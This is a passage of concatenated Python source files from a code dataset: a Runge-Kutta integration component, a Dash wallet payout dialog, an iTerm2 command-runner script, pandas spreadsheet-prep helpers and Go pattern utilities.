inputs[f'polynomial_controls:{name}'].ravel()\n\n seg_durations = theta[1] * np.diff(gd.segment_ends) / 2.0\n\n # step counter\n row = 0\n\n for seg_i in range(gd.num_segments):\n self._prob.model._get_subsystem('ode_eval').set_segment_index(seg_i)\n\n # Initialize, t, x, h, and derivatives for the start of the current segment\n self._initialize_segment(row, inputs, derivs=derivs)\n\n h = np.asarray(seg_durations[seg_i] / N, dtype=self._TYPE)\n # On each segment, the total derivative of the stepsize h is a function of\n # the duration of the phase (the second element of the parameter vector after states)\n if derivs:\n self._dh_dZ[row:row+N+1, 0, self.x_size+1] = seg_durations[seg_i] / theta[1] / N\n\n rm1 = row\n row = row + 1\n\n for q in range(N):\n # Compute the state rates and their partials at the start of the step\n self.eval_f(x[rm1, ...], t[rm1, 0], theta, self._k_q[0, ...], y=self._y[rm1, ...])\n\n if derivs:\n # Compute the state rate derivatives\n self.eval_f_derivs(x[rm1, ...], t[rm1, 0], theta, f_x, f_t, f_theta,\n y_x, y_t, y_theta)\n\n self._dkq_dZ[0, ...] = \\\n f_t @ self._dt_dZ[rm1, ...] + f_x @ self._dx_dZ[rm1, ...] + \\\n f_theta @ self._dtheta_dZ\n\n self._dy_dZ[rm1, ...] = \\\n y_x @ self._dx_dZ[rm1, ...] + y_t @ self._dt_dZ[rm1, ...] + \\\n y_theta @ self._dtheta_dZ\n\n for i in range(1, num_stages):\n T_i = t[rm1, ...] + c[i] * h\n a_tdot_k = np.tensordot(a[i, :i], self._k_q[:i, ...], axes=(0, 0))\n # a_tdot_k = np.einsum('i,ijk->jk', a[i, :i], self._k_q[:i, ...])\n X_i = x[rm1, ...] + h * a_tdot_k\n self.eval_f(X_i, T_i, theta, self._k_q[i, ...])\n\n if derivs:\n self.eval_f_derivs(X_i, T_i, theta, f_x, f_t, f_theta)\n self._dTi_dZ[...] = self._dt_dZ[row - 1, ...] + c[i] * self._dh_dZ[rm1, ...]\n a_tdot_dkqdz = np.tensordot(a[i, :i], self._dkq_dZ[:i, ...], axes=(0, 0))\n # a_tdot_dkqdz = np.einsum('i,ijk->jk', a[i, :i], self._dkq_dZ[:i, ...])\n self._dXi_dZ[...] = self._dx_dZ[rm1, ...] + a_tdot_k @ self._dh_dZ[rm1, ...] + h * a_tdot_dkqdz\n self._dkq_dZ[i, ...] = f_t @ self._dTi_dZ + f_x @ self._dXi_dZ + f_theta @ self._dtheta_dZ\n\n b_tdot_kq = np.tensordot(b, self._k_q, axes=(0, 0))\n # b_tdot_kq = np.einsum('i,ijk->jk', b, self._k_q)\n x[row, ...] = x[rm1, ...] + h * b_tdot_kq\n t[row, 0] = t[rm1, 0] + h\n\n if derivs:\n b_tdot_dkqdz = np.tensordot(b, self._dkq_dZ, axes=(0, 0))\n # b_tdot_dkqdz = np.einsum('i,ijk->jk', b, self._dkq_dZ)\n self._dx_dZ[row, ...] = \\\n self._dx_dZ[rm1, ...] + b_tdot_kq @ self._dh_dZ[rm1, ...] + h * b_tdot_dkqdz\n self._dt_dZ[row, ...] = self._dt_dZ[rm1, ...] + self._dh_dZ[rm1, ...]\n\n rm1 = row\n row = row + 1\n\n # Evaluate the ODE at the last point in the segment (with the final times and states)\n self.eval_f(x[rm1, ...], t[rm1, 0], theta, self._k_q[0, ...], y=self._y[rm1, ...])\n\n if derivs:\n self.eval_f_derivs(x[rm1, ...], t[rm1, 0], theta, f_x, f_t, f_theta, y_x, y_t, y_theta)\n self._dy_dZ[rm1, ...] = y_x @ self._dx_dZ[rm1, ...] + y_t @ self._dt_dZ[rm1, ...] + y_theta @ self._dtheta_dZ\n\n def compute(self, inputs, outputs):\n \"\"\"\n Compute propagated state values.\n\n Parameters\n ----------\n inputs : `Vector`\n `Vector` containing inputs.\n outputs : `Vector`\n `Vector` containing outputs.\n \"\"\"\n self._propagate(inputs, outputs)\n\n # Unpack the outputs\n idxs = self._output_src_idxs\n outputs['t_final'] = self._t[-1, ...]\n\n # Extract time\n outputs['time'] = self._t[idxs, ...]\n outputs['time_phase'] = self._t[idxs, ...] - inputs['t_initial']\n\n # Extract the state values\n for state_name, options in self.state_options.items():\n of = self._state_output_names[state_name]\n outputs[of] = self._x[idxs, self.state_idxs[state_name]]\n\n # Extract the control values and rates\n for control_name, options in self.control_options.items():\n oname = self._control_output_names[control_name]\n rate_name = self._control_rate_names[control_name]\n rate2_name = self._control_rate2_names[control_name]\n outputs[oname] = self._y[idxs, self._control_idxs_in_y[control_name]]\n outputs[rate_name] = self._y[idxs, self._control_rate_idxs_in_y[control_name]]\n outputs[rate2_name] = self._y[idxs, self._control_rate2_idxs_in_y[control_name]]\n\n # Extract the control values and rates\n for control_name, options in self.polynomial_control_options.items():\n oname = self._polynomial_control_output_names[control_name]\n rate_name = self._polynomial_control_rate_names[control_name]\n rate2_name = self._polynomial_control_rate2_names[control_name]\n outputs[oname] = self._y[idxs, self._polynomial_control_idxs_in_y[control_name]]\n outputs[rate_name] = self._y[idxs, self._polynomial_control_rate_idxs_in_y[control_name]]\n outputs[rate2_name] = self._y[idxs, self._polynomial_control_rate2_idxs_in_y[control_name]]\n\n # Extract the timeseries outputs\n for name, options in self._filtered_timeseries_outputs.items():\n oname = self._timeseries_output_names[name]\n outputs[oname] = self._y[idxs, self._timeseries_idxs_in_y[name]]\n\n def compute_partials(self, inputs, partials):\n \"\"\"\n Compute derivatives of propagated states wrt the inputs.\n\n Parameters\n ----------\n inputs : Vector\n Unscaled, dimensional input variables read via inputs[key].\n partials : Jacobian\n Subjac components written to partials[output_name, input_name].\n \"\"\"\n self._propagate(inputs, outputs=False, derivs=True)\n\n idxs = self._output_src_idxs\n partials['time', 't_duration'] = self._dt_dZ[idxs, 0, self.x_size+1]\n partials['time_phase', 't_duration'] = self._dt_dZ[idxs, 0, self.x_size+1]\n\n for state_name in self.state_options:\n of = self._state_output_names[state_name]\n\n # Unpack the derivatives\n of_rows = self.state_idxs[state_name]\n\n partials[of, 't_initial'] = self._dx_dZ[idxs, of_rows, self.x_size]\n partials[of, 't_duration'] = self._dx_dZ[idxs, of_rows, self.x_size+1]\n\n for wrt_state_name in self.state_options:\n wrt = self._state_input_names[wrt_state_name]\n wrt_cols = self._state_idxs_in_Z[wrt_state_name]\n partials[of, wrt] = self._dx_dZ[idxs, of_rows, wrt_cols]\n\n for wrt_param_name in self.parameter_options:\n wrt = self._param_input_names[wrt_param_name]\n wrt_cols = self._parameter_idxs_in_Z[wrt_param_name]\n partials[of, wrt] = self._dx_dZ[idxs, of_rows, wrt_cols]\n\n for wrt_control_name in self.control_options:\n wrt = self._control_input_names[wrt_control_name]\n wrt_cols = self._control_idxs_in_Z[wrt_control_name]\n partials[of, wrt] = self._dx_dZ[idxs, of_rows, wrt_cols]\n\n for wrt_pc_name in self.polynomial_control_options:\n wrt = self._polynomial_control_input_names[wrt_pc_name]\n wrt_cols = self._polynomial_control_idxs_in_Z[wrt_pc_name]\n partials[of, wrt] = self._dx_dZ[idxs, of_rows, wrt_cols]\n\n for control_name in self.control_options:\n of = self._control_output_names[control_name]\n of_rate = self._control_rate_names[control_name]\n of_rate2 = self._control_rate2_names[control_name]\n\n # Unpack the derivatives\n of_rows = self._control_idxs_in_y[control_name]\n of_rate_rows = self._control_rate_idxs_in_y[control_name]\n of_rate2_rows = self._control_rate2_idxs_in_y[control_name]\n\n wrt_cols = self.x_size + 1\n partials[of_rate, 't_duration'] = self._dy_dZ[idxs, of_rate_rows, wrt_cols]\n partials[of_rate2, 't_duration'] = self._dy_dZ[idxs, of_rate2_rows, wrt_cols]\n\n for wrt_control_name in self.control_options:\n wrt = self._control_input_names[wrt_control_name]\n wrt_cols = self._control_idxs_in_Z[wrt_control_name]\n partials[of, wrt] = self._dy_dZ[idxs, of_rows, wrt_cols]\n partials[of_rate, wrt] = self._dy_dZ[idxs, of_rate_rows, wrt_cols]\n partials[of_rate2, wrt] = self._dy_dZ[idxs, of_rate2_rows, wrt_cols]\n\n for name in self.polynomial_control_options:\n of = self._polynomial_control_output_names[name]\n of_rate = self._polynomial_control_rate_names[name]\n of_rate2 = self._polynomial_control_rate2_names[name]\n\n # Unpack the derivatives\n of_rows = self._polynomial_control_idxs_in_y[name]\n of_rate_rows = self._polynomial_control_rate_idxs_in_y[name]\n of_rate2_rows = self._polynomial_control_rate2_idxs_in_y[name]\n\n wrt_cols = self.x_size + 1\n partials[of_rate, 't_duration'] = self._dy_dZ[idxs, of_rate_rows, wrt_cols]\n partials[of_rate2, 't_duration'] = self._dy_dZ[idxs, of_rate2_rows, wrt_cols]\n\n for wrt_control_name in self.polynomial_control_options:\n wrt = self._polynomial_control_input_names[wrt_control_name]\n wrt_cols = self._polynomial_control_idxs_in_Z[wrt_control_name]\n partials[of, wrt] = self._dy_dZ[idxs, of_rows, wrt_cols]\n partials[of_rate, wrt] = self._dy_dZ[idxs, of_rate_rows, wrt_cols]\n partials[of_rate2, wrt] = self._dy_dZ[idxs, of_rate2_rows, wrt_cols]\n\n for name, options in self._filtered_timeseries_outputs.items():\n of = self._timeseries_output_names[name]\n of_rows = self._timeseries_idxs_in_y[name]\n\n partials[of, 't_initial'] = self._dy_dZ[idxs, of_rows, self.x_size]\n partials[of, 't_duration'] = self._dy_dZ[idxs, of_rows, self.x_size+1]\n\n for wrt_state_name in self.state_options:\n wrt = self._state_input_names[wrt_state_name]\n wrt_cols = self._state_idxs_in_Z[wrt_state_name]\n partials[of, wrt] = self._dy_dZ[idxs, of_rows, wrt_cols]\n\n for wrt_param_name in self.parameter_options:\n wrt = self._param_input_names[wrt_param_name]\n wrt_cols = self._parameter_idxs_in_Z[wrt_param_name]\n partials[of, wrt] = self._dy_dZ[idxs, of_rows, wrt_cols]\n\n for wrt_control_name in self.control_options:\n wrt = self._control_input_names[wrt_control_name]\n wrt_cols = self._control_idxs_in_Z[wrt_control_name]\n partials[of, wrt] = self._dy_dZ[idxs, of_rows, wrt_cols]\n\n for wrt_pc_name in self.polynomial_control_options:\n wrt = self._polynomial_control_input_names[wrt_pc_name]\n wrt_cols = self._polynomial_control_idxs_in_Z[wrt_pc_name]\n partials[of, wrt] = self._dy_dZ[idxs, of_rows, wrt_cols]\n","sub_path":"dymos/transcriptions/explicit_shooting/rk_integration_comp.py","file_name":"rk_integration_comp.py","file_ext":"py","file_size_in_byte":62753,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"157121855","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n# Author: Bertrand256\n# Created on: 2017-04\n\nimport datetime\nfrom operator import itemgetter\nfrom PyQt5 import QtCore\nfrom PyQt5.QtCore import QAbstractTableModel, QVariant, Qt, pyqtSlot\nfrom PyQt5.QtGui import QColor\nfrom PyQt5.QtWidgets import QDialog, QTableView, QHeaderView, QMessageBox\nimport app_cache as cache\nfrom app_config import MIN_TX_FEE, DATETIME_FORMAT\nfrom dashd_intf import DashdInterface, DashdIndexException\nfrom hw_intf import prepare_transfer_tx, hw_get_address\nfrom wnd_utils import WndUtils\nfrom ui import ui_send_payout_dlg\n\n\nclass PaymentTableModel(QAbstractTableModel):\n def __init__(self, parent, hide_collaterals_utxos, checked_changed_callback):\n QAbstractTableModel.__init__(self, parent)\n self.checked = False\n self.utxos = []\n self.hide_collaterals_utxos = hide_collaterals_utxos\n self.checked_changed_callback = checked_changed_callback\n self.columns = [\n # field_name, column header, visible, default col width\n ('satoshis', 'Amount (Dash)', True, 100),\n ('time_str', 'TX Date/Time', True, 140),\n ('mn', 'Masternode', True, 80),\n ('address', 'Address', True, 140),\n ('txid', 'TX ID', True, 220),\n ('outputIndex', 'TX Idx', True, 40)\n ]\n\n def setHideCollateralsUtxos(self, hide):\n self.hide_collaterals_utxos = hide\n self.beginResetModel()\n self.endResetModel()\n\n def columnCount(self, parent=None, *args, **kwargs):\n return len(self.columns) + 1\n\n def rowCount(self, parent=None, *args, **kwargs):\n rows = 0\n for utxo in self.utxos:\n if not self.hide_collaterals_utxos or not utxo.get('collateral', False):\n rows += 1\n return rows\n\n def headerData(self, section, orientation, role=None):\n if role != 0:\n return QVariant()\n if orientation == 0x1:\n if section > 0: # section 0 - checkboxes\n if section - 1 < len(self.columns):\n return self.columns[section - 1][1]\n return ''\n else:\n return \"Row\"\n\n def getDefaultColWidths(self):\n widths = [col[3] for col in self.columns]\n widths.insert(0, 35) # col width for checkbox column\n return widths\n\n def flags(self, index):\n if index.column() == 0:\n ret = Qt.ItemIsUserCheckable | Qt.ItemIsEnabled\n else:\n ret = Qt.ItemIsEnabled | Qt.ItemIsSelectable\n return ret\n\n def getUtxo(self, index):\n \"\"\"\n Returns utxo by its index. If self.hide_collaterals_utxos is True, utxo with 'collateral' value \n set to True is skipped.\n :return: utxo dict\n \"\"\"\n cur_idx = 0\n for utxo in self.utxos:\n if self.hide_collaterals_utxos and utxo.get('collateral', False):\n continue\n if cur_idx == index:\n return utxo\n cur_idx += 1\n return None\n\n def data(self, index, role=None):\n if index.isValid():\n col = index.column()\n row = index.row()\n if row < len(self.utxos):\n utxo = self.getUtxo(row)\n if utxo:\n if col == 0:\n # select tx checbox\n if role == Qt.CheckStateRole:\n return QVariant(Qt.Checked if utxo.get('checked', False) else Qt.Unchecked)\n elif role == Qt.DisplayRole:\n field_name = self.columns[col-1][0]\n if field_name == 'satoshis':\n return str(round(utxo['satoshis'] / 1e8, 8))\n else:\n return str(utxo.get(field_name, ''))\n # elif role == QtCore.Qt.FontRole:\n elif role == Qt.ForegroundRole:\n if utxo['collateral']:\n return QColor(Qt.red)\n return QVariant()\n\n def setData(self, index, value, role=None):\n if index.isValid() and role == QtCore.Qt.CheckStateRole:\n row = index.row()\n utxo = self.getUtxo(row)\n if utxo:\n if value == QtCore.Qt.Checked:\n utxo['checked'] = True\n else:\n utxo['checked'] = False\n self.dataChanged.emit(index, index)\n # notify - sum amount has changed\n if self.checked_changed_callback:\n self.checked_changed_callback()\n return True\n\n def getCheckedSumAmount(self):\n # sum amount of all checked utxos\n amount = 0\n for utxo in self.utxos:\n if self.hide_collaterals_utxos and utxo.get('collateral', False):\n continue\n if utxo['checked']:\n amount += utxo['satoshis']\n return amount\n\n def getSelectedUtxos(self):\n utxos = []\n for utxo in self.utxos:\n if self.hide_collaterals_utxos and utxo.get('collateral', False):\n continue\n if utxo['checked']:\n utxos.append(utxo)\n return utxos\n\n def setUtxos(self, utxos, masternodes):\n def utxo_assigned_to_collateral(utxo):\n for mn in masternodes:\n if mn.collateralTx == utxo['txid'] and str(mn.collateralTxIndex) == str(utxo['outputIndex']):\n return True\n return False\n def mn_by_address(address):\n for mn in masternodes:\n if mn.collateralAddress == address:\n return mn.name\n return ''\n\n for utxo in utxos:\n if utxo_assigned_to_collateral(utxo):\n utxo['collateral'] = True\n utxo['checked'] = False\n else:\n utxo['collateral'] = False\n utxo['checked'] = True\n utxo['mn'] = mn_by_address(utxo['address'])\n\n self.utxos = sorted(utxos, key=itemgetter('height'), reverse=True)\n self.beginResetModel()\n self.endResetModel()\n if self.checked_changed_callback:\n self.checked_changed_callback()\n\n\nclass SendPayoutDlg(QDialog, ui_send_payout_dlg.Ui_SendPayoutDlg, WndUtils):\n error_signal = QtCore.pyqtSignal(str)\n thread_finished = QtCore.pyqtSignal()\n\n def __init__(self, utxos_source, main_ui):\n \"\"\"\n Constructor\n :param utxos_source: list of tuples (dash address, bip32 path) - from which\n we'll list all unspent outputs\n :param masternodes: list of masternodes in configuration; used for checking if txid/index \n is assigned to mn's collateral \n \"\"\"\n QDialog.__init__(self)\n WndUtils.__init__(self, main_ui.app_path)\n assert isinstance(utxos_source, list)\n assert isinstance(main_ui.dashd_intf, DashdInterface)\n self.utxos_source = utxos_source\n self.dashd_intf = main_ui.dashd_intf\n self.table_model = None\n self.utxos = []\n self.masternodes = main_ui.config.masternodes\n self.main_ui = main_ui\n self.setupUi()\n\n def setupUi(self):\n ui_send_payout_dlg.Ui_SendPayoutDlg.setupUi(self, self)\n assert isinstance(self.tableView, QTableView)\n self.resize(cache.get_value('WndPayoutWidth', 800, int),\n cache.get_value('WndPayoutHeight', 460, int))\n self.setWindowTitle('Transfer funds')\n self.closeEvent = self.closeEvent\n self.chbHideCollateralTx.setChecked(True)\n self.btnClose.clicked.connect(self.btnCloseClick)\n self.btnSend.clicked.connect(self.btnSendClick)\n self.edtDestAddress.setText(cache.get_value('WndPayoutPaymentAddress', '', str))\n self.edtDestAddress.textChanged.connect(self.edtDestAddressChanged)\n self.setIcon(self.btnCheckAll, 'check.png')\n self.setIcon(self.btnUncheckAll, 'uncheck.png')\n\n self.table_model = PaymentTableModel(None, self.chbHideCollateralTx.isChecked(), self.onUtxoCheckChanged)\n self.tableView.setModel(self.table_model)\n self.tableView.horizontalHeader().resizeSection(0, 35)\n self.tableView.horizontalHeader().setSectionResizeMode(0, QHeaderView.Fixed)\n self.tableView.verticalHeader().setDefaultSectionSize(self.tableView.verticalHeader().fontMetrics().height() + 6)\n\n # set utxo table default column widths\n cws = cache.get_value('WndPayoutColWidths', self.table_model.getDefaultColWidths(), list)\n for col, w in enumerate(cws):\n self.tableView.setColumnWidth(col, w)\n\n self.chbHideCollateralTx.toggled.connect(self.chbHideCollateralTxToggled)\n self.resizeEvent = self.resizeEvent\n\n self.threadFunctionDialog(self.load_utxos_thread, (), True, center_by_window=self.main_ui)\n self.table_model.setUtxos(self.utxos, self.masternodes)\n\n def closeEvent(self, event):\n w = self.size().width()\n h = self.size().height()\n cache.set_value('WndPayoutWidth', w)\n cache.set_value('WndPayoutHeight', h)\n # save column widths\n widths = []\n for col in range(self.table_model.columnCount()):\n widths.append(self.tableView.columnWidth(col))\n cache.set_value('WndPayoutColWidths', widths)\n\n def edtDestAddressChanged(self):\n # save payment address to cache\n cache.set_value('WndPayoutPaymentAddress', self.edtDestAddress.text())\n\n def chbHideCollateralTxToggled(self):\n self.table_model.setHideCollateralsUtxos(self.chbHideCollateralTx.isChecked())\n\n def onUtxoCheckChanged(self):\n self.lblAmount.setText(str(round(self.table_model.getCheckedSumAmount() / 1e8, 8)))\n\n # estimate transaction fee\n utxos = self.table_model.getSelectedUtxos()\n fee = round((len(utxos) * 148 + 33 - 10) / 1000) * MIN_TX_FEE\n if not fee:\n fee = MIN_TX_FEE\n self.edtTxFee.setValue(round(fee / 1e8, 8))\n\n @pyqtSlot(bool)\n def on_btnUncheckAll_clicked(self):\n for utxo in self.utxos:\n utxo['checked'] = False\n self.table_model.beginResetModel()\n self.table_model.endResetModel()\n self.onUtxoCheckChanged()\n\n @pyqtSlot(bool)\n def on_btnCheckAll_clicked(self):\n for utxo in self.utxos:\n utxo['checked'] = True\n self.table_model.beginResetModel()\n self.table_model.endResetModel()\n self.onUtxoCheckChanged()\n\n def btnSendClick(self):\n \"\"\"\n Sends funds to Dash address specified by user.\n \"\"\"\n utxos = self.table_model.getSelectedUtxos()\n if len(utxos):\n address = self.edtDestAddress.text()\n if address:\n if not self.main_ui.connectHardwareWallet():\n return\n\n bip32_to_address = {} # for saving addresses read from HW by BIP32 path\n\n # check if user selected masternode collateral transaction; if so display warning\n # also check if UTXO dash address matches address of BIP32 path in HW\n for utxo in utxos:\n if utxo['collateral']:\n if self.queryDlg(\n \"Warning: you are going to transfer Masternode's collateral (1000 Dash) transaction \"\n \"output. Proceeding will result in broken Masternode.\\n\\n\"\n \"Do you really want to continue?\",\n buttons=QMessageBox.Yes | QMessageBox.Cancel,\n default_button=QMessageBox.Cancel, icon=QMessageBox.Warning) == QMessageBox.Cancel:\n return\n bip32_path = utxo.get('bip32_path', None)\n if not bip32_path:\n self.errorMsg('No BIP32 path for UTXO: %s. Cannot continue.' % utxo['txid'])\n return\n\n addr_hw = bip32_to_address.get(bip32_path, None)\n if not addr_hw:\n address_n = self.main_ui.hw_client.expand_path(bip32_path)\n addr_hw = hw_get_address(self.main_ui.hw_client, address_n)\n bip32_to_address[bip32_path] = addr_hw\n if addr_hw != utxo['address']:\n self.errorMsg(\"Current Dash address from %s's path %s (%s) doesn't match address of funds \"\n \"being sent (%s).\\n\\nCannot continue.\" %\n (self.main_ui.getHwName(), bip32_path, addr_hw, utxo['address']))\n return\n\n try:\n if self.dashd_intf.validateaddress(address).get('isvalid', False):\n fee = self.edtTxFee.value() * 1e8\n serialized_tx, amount_to_send = prepare_transfer_tx(self.main_ui, utxos, address, fee)\n tx_hex = serialized_tx.hex()\n if len(tx_hex) > 90000:\n self.errorMsg(\"Transaction's length exceeds 90000 bytes. Select less utxo's and try again.\")\n else:\n if self.queryDlg('Broadcast signed transaction?\\n\\n'\n 'Destination address: %s\\n'\n 'Amount to send: %s Dash\\nFee: %s Dash\\n'\n 'Size: %d bytes' % ( address, str(round(amount_to_send / 1e8, 8)),\n str(round(fee / 1e8, 8) ),\n len(tx_hex)/2),\n buttons=QMessageBox.Yes | QMessageBox.Cancel,\n default_button=QMessageBox.Yes) == QMessageBox.Yes:\n\n decoded_tx = self.dashd_intf.decoderawtransaction(tx_hex)\n txid = self.dashd_intf.sendrawtransaction(tx_hex)\n if txid:\n self.infoMsg('Transaction sent. ID: ' + txid)\n else:\n self.errorMsg('Problem with sending transaction: no txid returned')\n else:\n self.errorMsg('Invalid destination Dash address (%s).' % address)\n except Exception as e:\n self.errorMsg(str(e))\n else:\n self.errorMsg('Missing destination Dash address.')\n else:\n self.errorMsg('No utxo to send.')\n\n def btnCloseClick(self):\n self.close()\n\n def load_utxos_thread(self, ctrl):\n if not self.dashd_intf.open():\n self.errorMsg('Dash daemon not connected')\n else:\n try:\n ctrl.dlg_config_fun(dlg_title=\"Loading unspent transaction outputs...\", show_message=True,\n show_progress_bar=False)\n ctrl.display_msg_fun('Loading unspent transaction outputs. Please wait...')\n addresses = []\n for a in self.utxos_source:\n if a[0] and a[0] not in addresses:\n addresses.append(a[0])\n\n if len(addresses):\n self.utxos = self.dashd_intf.getaddressutxos(addresses)\n\n try:\n # for each utxo read block time\n for utxo in self.utxos:\n blockhash = self.dashd_intf.getblockhash(utxo.get('height'))\n bh = self.dashd_intf.getblockheader(blockhash)\n utxo['time_str'] = datetime.datetime.fromtimestamp(bh['time']).strftime(DATETIME_FORMAT)\n\n # for a given utxo dash address find its bip32 path\n found = False\n for a in self.utxos_source:\n if a[0] == utxo['address']:\n utxo['bip32_path'] = a[1]\n found = True\n break\n if not found:\n raise Exception('UTXO address mismatch')\n\n except Exception as e:\n self.errorMsg(str(e))\n\n except DashdIndexException as e:\n self.errorMsg(str(e))\n\n except Exception as e:\n self.errorMsg('Error occurred while calling getaddressutxos method: ' + str(e))\n","sub_path":"src/send_payout_dlg.py","file_name":"send_payout_dlg.py","file_ext":"py","file_size_in_byte":16704,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"394847593","text":"#!/usr/bin/env python3\n\nimport iterm2\nimport sys\n\n_, TITLE, SESSION_ID, CMD = sys.argv\n\ndef find_session(window):\n for tab in window.tabs:\n for session in tab.sessions:\n if session.session_id == SESSION_ID:\n return session\n\n\nasync def main(connection):\n app = await iterm2.async_get_app(connection)\n window = app.current_terminal_window\n session = find_session(window)\n \n if session is None:\n tab = await window.async_create_tab()\n session = tab.current_session\n await session.async_set_name(TITLE)\n else:\n await session.async_activate()\n # Ctrl+C\n await session.async_send_text('\\003')\n\n await session.async_send_text('{}\\n'.format(CMD))\n print(session.session_id)\n \niterm2.run_until_complete(main)\n","sub_path":"scripts/run-in-iterm.py","file_name":"run-in-iterm.py","file_ext":"py","file_size_in_byte":805,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"620993208","text":"import pandas as pd\nfrom xlsxmetadata.metadata import get_sheet_names\nfrom io import BytesIO\nfrom openpyxl import load_workbook\nimport re\n\n\ndef prep_givens_file(givens_file):\n sought = ['Brampton', 'Chesapeake','Plainfield','Reno','Hope']\n adj_sought = [x + ' Adjustments' for x in sought]\n keep_columns = givens_columns()\n\n frames = pd.read_excel(givens_file, sheet_name=None, converters={\"ORDER #'s\":str})\n\n flat_names = [x for x in frames if x in sought]\n adj_names = [x for x in frames if x in adj_sought]\n all_names = flat_names + adj_names\n\n frames = {k: v for k, v in frames.items() if k in all_names}\n\n flat_frames = []\n adj_frames = []\n\n for name, df in frames.items():\n df.columns = df.iloc[5]\n df = df.drop(labels=range(6), axis=0)\n\n if name in flat_names:\n df = df.dropna(thresh=12)\n df['location'] = name\n df = df[[*list(keep_columns.keys())]]\n df = df.rename(keep_columns, axis='columns')\n flat_frames.extend(df.to_dict(orient='records'))\n\n elif name in adj_names:\n df = df.dropna(thresh=4)\n df['location'] = name.replace('Adjustments','').strip()\n df = df[[*list(keep_columns.keys())]]\n df = df.rename(keep_columns, axis='columns')\n adj_frames.extend(df.to_dict(orient='records'))\n\n return (flat_frames, adj_frames)\n\n\ndef givens_columns():\n return {\n 'LOAD NUMBER': 'load_number',\n \"ORDER #'s\": 'order_numbers',\n 'SHIP DATE': 'ship_date',\n 'CARRIER': 'carrier',\n 'TOTAL': 'total'\n }\n\n\ndef prep_freight_report(freight_report):\n\n keep_columns = freight_report_columns()\n frames = pd.read_excel(freight_report, sheet_name=None)\n\n records = []\n for k, df in frames.items():\n df = df[[*list(keep_columns.keys())]]\n df.rename(keep_columns, axis='columns')\n records.append(df)\n\n return pd.concat(records).to_dict(orient='records')\n\n\ndef freight_report_columns():\n return {\n 'MM': 'month',\n 'YY': 'year',\n 'Pick Ticket': 'pick_ticket',\n 'Order': 'order_number',\n 'Doc#': 'document_number',\n 'Sales': 'sales',\n 'Cost': 'cost',\n 'Freight Sales': 'freight_sales',\n 'Freight Cost': 'freight_cost',\n 'Carrier#': 'carrier_number',\n 'Name': 'carrier',\n 'Company': 'company',\n 'Tracking Number': 'tracking_number',\n 'Original Pick Ticket 1': 'original_pick_ticket'\n }\n","sub_path":"app/src/preppers/file_prep.py","file_name":"file_prep.py","file_ext":"py","file_size_in_byte":2522,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"419641327","text":"\"\"\"\npattern_util.py\nUtility functions for rule based simulations.\n\"\"\"\n\nimport numpy as np\nfrom pattern import pat3set\nimport random\n\nfrom board_util import GoBoardUtil, EMPTY, PASS, BORDER\n\n\nclass PatternUtil(object):\n\n @staticmethod\n def neighborhood_33(board, point):\n \"\"\"\n Get the pattern around point.\n Returns\n -------\n patterns :\n Set of patterns in the same format of what michi pattern base provides. Please refer to pattern.py to see the format of the pattern.\n \"\"\"\n positions = [point-board.NS-1, point-board.NS, point-board.NS+1,\n point-1, point, point+1,\n point+board.NS-1, point+board.NS, point+board.NS+1]\n\n pattern = \"\"\n for d in positions:\n if board.board[d] == board.current_player:\n pattern += 'X'\n elif board.board[d] == GoBoardUtil.opponent(board.current_player):\n pattern += 'x'\n elif board.board[d] == EMPTY:\n pattern += '.'\n elif board.board[d] == BORDER:\n pattern += ' '\n return pattern\n\n @staticmethod\n def generate_pattern_moves(board):\n \"\"\"\n Generate a list of moves that match pattern.\n This only checks moves that are neighbors of the moves in the last two steps.\n See last_moves_empty_neighbors() in simple_board for detail.\n \"\"\"\n color = board.current_player\n pattern_checking_set = board.last_moves_empty_neighbors()\n moves = []\n for p in pattern_checking_set:\n if (PatternUtil.neighborhood_33(board, p) in pat3set):\n assert p not in moves\n assert board.board[p] == EMPTY\n moves.append(p)\n return moves\n \n @staticmethod\n def filter_moves_and_generate(board, moves, check_selfatari):\n \"\"\"\n Move filter function.\n \"\"\"\n color = board.current_player\n while len(moves) > 0:\n candidate = random.choice(moves)\n if PatternUtil.filter(board, candidate, color, check_selfatari):\n moves.remove(candidate)\n else:\n return candidate\n return None\n \n @staticmethod\n def filter_moves(board, moves, check_selfatari):\n color = board.current_player\n good_moves = []\n for move in moves:\n if not PatternUtil.filter(board,move,color,check_selfatari):\n good_moves.append(move)\n return good_moves\n \n # return True if move should be filtered\n @staticmethod\n def filleye_filter(board, move, color):\n assert move != None\n return not board.is_legal(move, color) or board.is_eye(move, color)\n \n # return True if move should be filtered\n @staticmethod\n def selfatari_filter(board, move, color):\n return ( PatternUtil.filleye_filter(board, move, color)\n or PatternUtil.selfatari(board, move, color)\n )\n \n # return True if move should be filtered\n @staticmethod\n def filter(board, move, color, check_selfatari):\n if check_selfatari:\n return PatternUtil.selfatari_filter(board, move, color)\n else:\n return PatternUtil.filleye_filter(board, move, color)\n\n @staticmethod\n def selfatari(board, move, color):\n max_old_liberty = PatternUtil.blocks_max_liberty(board, move, color, 2)\n if max_old_liberty > 2:\n return False\n cboard = board.copy()\n # swap out true board for simulation board, and try to play the move\n isLegal = cboard.play_move(move, color)\n if isLegal:\n new_liberty = cboard._liberty(move, color)\n if new_liberty==1:\n return True\n return False\n \n @staticmethod\n def blocks_max_liberty(board, point, color, limit):\n assert board.board[point] == EMPTY\n max_lib = -1 # will return this value if this point is a new block\n neighbors = board._neighbors(point)\n for n in neighbors:\n if board.board[n] == color:\n num_lib = board._liberty(n, color)\n if num_lib > limit:\n return num_lib\n if num_lib > max_lib:\n max_lib = num_lib\n return max_lib\n \n @staticmethod\n def generate_move_with_filter(board, use_pattern, check_selfatari):\n \"\"\"\n Arguments\n ---------\n check_selfatari: filter selfatari moves?\n Note that even if True, this filter only applies to pattern moves\n use_pattern: Use pattern policy?\n \"\"\"\n move = None\n if use_pattern:\n moves = PatternUtil.generate_pattern_moves(board)\n move = PatternUtil.filter_moves_and_generate(board, moves,\n check_selfatari)\n if move == None:\n move = GoBoardUtil.generate_random_move(board, board.current_player,False) #do not filter eye-filling moves.\n return move\n \n @staticmethod\n def generate_all_policy_moves(board, pattern, check_selfatari):\n \"\"\"\n generate a list of policy moves on board for board.current_player.\n Use in UI only. For playing, use 